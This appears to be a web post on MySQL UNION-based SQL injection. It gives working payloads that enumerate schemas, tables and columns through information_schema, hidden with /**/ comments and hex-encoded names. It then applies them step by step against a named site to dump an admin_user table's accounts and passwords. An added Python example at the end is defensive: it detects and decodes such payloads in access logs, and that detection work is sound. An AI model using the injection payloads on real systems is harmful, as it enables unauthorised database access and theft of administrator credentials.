Enumerating databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerating tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerating columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dumping tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the 4th one.

2. Dumping columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dumping passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
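
Added example, not part of the original post: a Python check for web access logs that undoes the two obfuscations the payloads above rely on (/**/ in place of spaces, hex literals in place of quoted names) and then flags UNION SELECT against information_schema. The sample query strings are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Closed /*...*/ comments, plus a trailing unclosed /* used to cut off the rest of the query.
COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)
HEX_LIT = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b")
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b")
METADATA = re.compile(r"\binformation_schema\.(schemata|tables|columns)\b")

def normalize(query):
    """URL-decode, replace SQL comments with a space, collapse whitespace, lowercase."""
    text = COMMENT.sub(" ", unquote_plus(query))
    return re.sub(r"\s+", " ", text).strip().lower()

def decode_hex(text):
    """Return printable-ASCII strings hidden in 0x... literals (quote-free names)."""
    found = []
    for match in HEX_LIT.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found

def analyze(query):
    """Summarise one logged query string (hypothetical helper for this example)."""
    norm = normalize(query)
    meta = METADATA.search(norm)
    return {
        "union_select": bool(UNION.search(norm)),
        "metadata_view": meta.group(1) if meta else None,
        "hex_strings": decode_hex(norm),
    }

# Constructed log entries: the page's payload shape, a URL-encoded mixed-case variant, a normal hit.
SAMPLES = [
    "ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "ccausid=1%2F**%2FuNiOn%2F**%2FSeLeCt%2F**%2F1,COLUMN_NAME%2F**%2Ffrom%2F**%2Finformation_schema.COLUMNS%2F**%2Fwhere%2F**%2FTABLE_NAME%3D0x61646D696E5F75736572",
    "ccausid=13240",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line))
```

Decoding the hex literals in an alert shows the responder which schema or table the request was probing, which helps scope what to review on the database side.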